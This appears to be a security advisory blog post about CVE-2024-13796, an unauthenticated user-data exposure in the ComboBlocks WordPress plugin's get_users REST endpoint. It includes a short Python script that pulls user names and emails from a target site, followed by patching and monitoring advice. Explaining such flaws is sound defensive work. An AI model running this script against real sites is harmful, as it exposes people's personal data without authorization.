CVE-2024-13796 is a critical vulnerability that has been identified in "The Post Grid and Gutenberg Blocks – ComboBlocks" plugin for WordPress. Up to and including version 2.3.6, the plugin is susceptible to an attack which can lead to sensitive information exposure through the /wp-json/post-grid/v2/get_users REST API. This means unauthenticated attackers can potentially access and extract crucial information, such as user emails and other personal data.

In this post, we'll take a deep dive into the vulnerability, its impact, and how it can be exploited. We'll examine code snippets, share original references, and discuss the potential risks associated with this issue.

What is The Post Grid and Gutenberg Blocks – ComboBlocks?

The Post Grid and Gutenberg Blocks – ComboBlocks is a popular plugin for WordPress. It allows site administrators to create and manage responsive post grids and post listings with the help of the Gutenberg block editor. The plugin's functionality is especially valuable to those who want to create visually appealing, organized, and clean layouts for their blogs or websites.

Vulnerability Details

The vulnerability lies in the /wp-json/post-grid/v2/get_users REST API of the ComboBlocks plugin. This API is designed to return a list of users with details such as usernames, display names, and profile images. However, the plugin does not adequately restrict access to this data, making it possible for unauthenticated attackers to extract sensitive information.

The following code snippet is an example of how an attacker could exploit this vulnerability

import requests
import json

target_url = "http://target-site.com/wp-json/post-grid/v2/get_users";
response = requests.get(target_url)
data = response.json()

for user in data:
    print(f"User ID: {user['ID']} - Display Name: {user['display_name']} - Email: {user['user_email']}")

Replace "http://target-site.com"; with the URL of the targeted WordPress site. Running this script will print the extracted user information to the console.

Original References

1. The CVE announcement and additional details can be found here.
2. Further insight into the vulnerability was provided by the researchers at WPScan in their Vulnerability Database.

To mitigate this vulnerability, it is crucial that you take the following steps

1. Update the WordPress plugin immediately: If you are using the ComboBlocks plugin, ensure you update it to the latest version as soon as possible. The vulnerability has been fixed in version 2.3.7. Keep in mind that staying up to date with all security updates is an essential practice in maintaining a safe and secure environment for your website.

2. Remove sensitive information: Reconsider storing sensitive and potentially damaging information in the user profile fields. Evaluate the necessity of storing this kind of information within the plugin and look for alternative methods to protect users' privacy.

3. Monitor for signs of exploitation: Regularly check your site's server logs for any signs of unauthorized access or suspicious activities targeting the /wp-json/post-grid/v2/get_users API endpoint, and investigate any potential indicators of compromise.

Conclusion

Staying informed about emerging threats and vulnerabilities like the CVE-2024-13796 is vital for maintaining the digital security of your website. By remaining vigilant and implementing the recommended mitigation steps, you can protect your users' data and ensure the integrity and safety of your WordPress site.

Timeline

Published on: 02/28/2025 05:15:32 UTC
Last modified on: 03/06/2025 20:49:05 UTC